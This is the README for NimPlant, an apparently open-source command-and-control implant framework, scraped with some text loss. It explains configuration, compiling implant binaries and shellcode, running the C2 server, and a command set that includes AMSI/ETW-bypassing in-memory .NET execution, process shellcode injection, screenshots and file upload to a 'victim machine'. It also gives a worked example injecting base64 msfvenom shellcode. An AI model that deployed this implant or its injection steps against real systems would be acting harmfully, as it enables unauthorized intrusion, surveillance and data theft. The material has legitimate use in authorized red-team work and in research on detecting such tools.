NimPlant is a light first-stage C2 implant written in Nim and Python
, shinject
(using dynamic invocation), or in-thread execute-assembly
is recommended, as apt
doesnât always have the latest version).cd client; nimble install -d
from the server folder (pip3 install -r server/requirements.txt
toolchain for your platform (brew install mingw-w64
or apt install mingw-w64
).Before using NimPlant, create the configuration file config.toml
. It is recommended to copy config.toml.example
and work from there.
An overview of settings is provided below.
Category | Setting | Description |
server | ip | The IP that the C2 web server (including API) will listen on. Recommended to use, only use when you have setup proper firewall or routing rules to protect the C2. |
server | port | The port that the C2 web server (including API) will listen on. |
listener | type | The listener type, either HTTP or HTTPS. HTTPS options configured below. |
listener | sslCertPath | The local path to a HTTPS certificate file (e.g. requested via LetsEncrypt CertBot or self-signed). Ignored when listener type is âHTTPâ. |
listener | sslKeyPath | The local path to the corresponding HTTPS certificate private key file. Password will be prompted when running the NimPlant server if set. Ignored when listener type is âHTTPâ. |
listener | hostname | The listener hostname. If not empty (ââ), NimPlant will use this hostname to connect. Make sure you are properly routing traffic from this host to the NimPlant listener port. |
listener | ip | The listener IP. Required even if âhostnameâ is set, as it is used by the server to register on this IP. |
listener | port | The listener port. Required even if âhostnameâ is set, as it is used by the server to register on this port. |
listener | registerPath | The URI path that new NimPlants will register with. |
listener | taskPath | The URI path that NimPlants will get tasks from. |
listener | resultPath | The URI path that NimPlants will submit results to. |
nimplant | riskyMode | Compile NimPlant with support for risky commands. Operator discretion advised. Disabling will remove support for execute-assembly , powershell , shell and shinject . |
nimplant | sleepMask | Whether or not to use Ekko sleep mask instead of regular sleep calls for Nimplants. Only works with regular executables for now! |
nimplant | sleepTime | The default sleep time in seconds for new NimPlants. |
nimplant | sleepJitter | The default jitter in percent for new NimPlants. |
nimplant | killDate | The kill date for Nimplants (format: yyyy-MM-dd). Nimplants will exit if this date has passed. |
nimplant | userAgent | The user-agent used by NimPlants. The server also uses this to validate NimPlant traffic, so it is recommended to choose a UA that is inconspicuous, but not too prevalent. |
Once the configuration is to your liking, you can generate NimPlant binaries to deploy on your target. Currently, NimPlant supports .exe
, .dll
, and .bin
binaries for (self-deleting) executables, libraries, and position-independent shellcode (through sRDI), respectively. To generate, run python compile
followed by your preferred binaries (exe
, exe-selfdelete
, dll
, raw
, or all
) and, optionally, the implant type (nim
, or nim-debug
). Files will be written to client/bin/
You may pass the rotatekey
argument to generate and use a new XOR key during compilation.
, which is triggered by DllMain for all entrypoints. This means you can use e.g. rundll32 .\NimPlant.dll,Update
to trigger, or use your LOLBIN of choice to sideload it (may need some modifications in client/NimPlant.nim
)PS C:\NimPlant> python .\ compile all
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** **(## ##
######## ( ********
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
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####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
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_ _ _ ____ _ _
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| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
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A light-weight stage 1 implant and C2 based on Nim and Python
By Cas van Cooten (@chvancooten)
Compiling .exe for NimPlant
Compiling self-deleting .exe for NimPlant
Compiling .dll for NimPlant
Compiling .bin for NimPlant
Done compiling! You can find compiled binaries in 'client/bin/'.
The Docker image chvancooten/nimbuild can be used to compile NimPlant binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.
To use it, install Docker for your OS and start the compilation in a container as follows.
docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 compile all
Once you have your binaries ready, you can spin up your NimPlant server! No additional configuration is necessary as it reads from the same config.toml
file. To launch a server, simply run python server
(with sudo privileges if running on Linux). You can use the console once a Nimplant checks in, or access the web interface at http://localhost:31337
(by default).
and .xorkey
match. If not, NimPlant will not be able to connect.client/NimPlant.nim
directory. Each server instance creates a new log folder, and logs are split per console/nimplant session. Downloads and uploads (including files uploaded via the web GUI) are stored in the server/uploads
and server/downloads
directories respectively.server/nimplant.db
. This data is also used to recover Nimplants after a server
with the cleanup
flag. Caution: This will purge everything, so make sure to back up what you need first!PS C:\NimPlant> python .\ server
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# ######## ******** *
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##### ## * ** *****
###### #### ##*** **** .******
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| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
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A light-weight stage 1 implant and C2 written in Nim and Python
By Cas van Cooten (@chvancooten)
[06/02/2023 10:47:23] Started management server on
[06/02/2023 10:47:23] Started NimPlant listener on CTRL-C to cancel waiting for NimPlants.
This will start both the C2 API and management web server (in the example above at
) and the NimPlant listener (in the example above at
). Once a NimPlant checks in, you can use both the web interface and the console to send commands to NimPlant.
Available commands are as follows. You can get detailed help for any command by typing help [command]
. Certain commands denoted with (GUI) can be configured graphically when using the web interface, this can be done by calling the command without any arguments.
Command arguments shown as [required] <optional>.
Commands with (GUI) can be run without parameters via the web UI.
cancel Cancel all pending tasks.
cat [filename] Print a file's contents to the screen.
cd [directory] Change the working directory.
clear Clear the screen.
cp [source] [destination] Copy a file or directory.
curl [url] Get a webpage remotely and return the results.
download [remotefilepath] <localfilepath> Download a file from NimPlant's disk to the NimPlant server.
env Get environment variables.
execute-assembly (GUI) <BYPASSAMSI=0> <BLOCKETW=0> [localfilepath] <arguments> Execute .NET assembly from memory. AMSI/ETW patched by default. Loads the CLR.
exit Exit the server, killing all NimPlants.
getAv List Antivirus / EDR products on target using WMI.
getDom Get the domain the target is joined to.
getLocalAdm List local administrators on the target using WMI.
getpid Show process ID of the currently selected NimPlant.
getprocname Show process name of the currently selected NimPlant.
help <command> Show this help menu or command-specific help.
hostname Show hostname of the currently selected NimPlant.
inline-execute (GUI) [localfilepath] [entrypoint] <arg1 type1 arg2 type2..> Execute Beacon Object Files (BOF) from memory.
ipconfig List IP address information of the currently selected NimPlant.
kill Kill the currently selected NimPlant.
list Show list of active NimPlants.
listall Show list of all NimPlants.
ls <path> List files and folders in a certain directory. Lists current directory by default.
mkdir [directory] Create a directory (and its parent directories if required).
mv [source] [destination] Move a file or directory.
nimplant Show info about the currently selected NimPlant.
osbuild Show operating system build information for the currently selected NimPlant.
powershell <BYPASSAMSI=0> <BLOCKETW=0> [command] Execute a PowerShell command in an unmanaged runspace. Loads the CLR.
ps List running processes on the target. Indicates current process.
pwd Get the current working directory.
reg [query|add] [path] <key> <value> Query or modify the registry. New values will be added as REG_SZ.
rm [file] Remove a file or directory.
run [binary] <arguments> Run a binary from disk. Returns output but blocks NimPlant while running.
screenshot Take a screenshot of the user's screen.
select [id] Select another NimPlant.
shell [command] Execute a shell command.
shinject (GUI) [targetpid] [localfilepath] Load raw shellcode from a file and inject it into the specified process's memory space using dynamic invocation.
sleep [sleeptime] <jitter%> Change the sleep time of the current NimPlant.
upload (GUI) [localfilepath] <remotefilepath> Upload a file from the NimPlant server to the victim machine.
wget [url] <remotefilepath> Download a file to disk remotely.
whoami Get the user ID that NimPlant is running as.
NOTE: BOFs are volatile by nature, and running a faulty BOF or passing wrong arguments or types WILL crash your NimPlant session! Make sure to test BOFs before deploying!
NimPlant supports the in-memory loading of BOFs thanks to the great NiCOFF project. Running a bof requires a local compiled BOF object file (usually called something like bofname.x64.o
), an entrypoint (commonly go
), and a list of arguments with their respective argument types. Arguments are passed as a space-seperated arg argtype
Argument are given in accordance with the âZzsibâ format, so can be either string
(alias: z
), wstring
(or Z
), integer
(aliases: int
or i
), short
), or binary
or b
). Binary arguments can be a raw binary string or base64-encoded, the latter is recommended to avoid bad characters.
Some examples of usage (using the magnificent TrustedSec BOFs [1, 2] as an example) are given below. Note that inline-execute
(without arguments) can be used to configure the command graphically in the GUI.
# Run a bof without arguments inline-execute ipconfig.x64.o go # Run the `dir` bof with one wide-string argument specifying the path to list, quoting optional inline-execute dir.x64.o go "C:\Users\victimuser\desktop" Z # Run an injection BOF specifying an integer for the process ID and base64-encoded shellcode as bytes # Example shellcode generated with the command: msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f base64 inline-execute /linux/path/to/createremotethread.x64.o go 1337 i /EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA b # Depending on the BOF, sometimes argument parsing is a bit different using NiCOFF # Make sure arguments are passed as expected by the BOF (can usually be retrieved from .CNA or BOF source) # An example: inline-execute enum_filter_driver.x64.o go # CRASHES - default null handling does not work inline-execute enum_filter_driver.x64.o go "" z # OK - arguments are passed as expected
By default, NimPlant support push notifications via the notify_user()
hook defined in server/util/
. By default, it implements a simple Telegram notification which requires the TELEGRAM_CHAT_ID
environment variables to be set before it will fire. Of course, the code can be easily extended with oneâs own push notification functionality. The notify_user()
hook is called when a new NimPlant checks in, and receives an object with NimPlant details, which can then be pushed as desired.
As a normal user, you shouldnât have to modify or re-build the UI that comes with Nimplant. However, if you so desire to make changes, install NodeJS and run an npm install
while in the ui
directory. Then run ui/
. This will take care of pulling the packages, compiling the Next.JS frontend, and placing the files in the right location for the Nimplant server to use them.
NimPlant was developed as a learning project and released to the public for transparency and educational purposes. For a large part, it makes no effort to hide its intentions. Additionally, protections have been put in place to prevent abuse. In other words, do NOT use NimPlant in production engagements as-is without thorough source code review and modifications! Also remember that, as with any C2 framework, the OPSEC fingerprint of running certain commands should be considered before deployment. NimPlant can be compiled without OPSEC-risky commands by setting riskyMode
to false
in config.toml
There are many reasons why Nimplant may fail to compile or run. If you encounter issues, please try the following (in order):
docker container to rule out any dependency issuesserver/logs
directory for any errorsnim-debug
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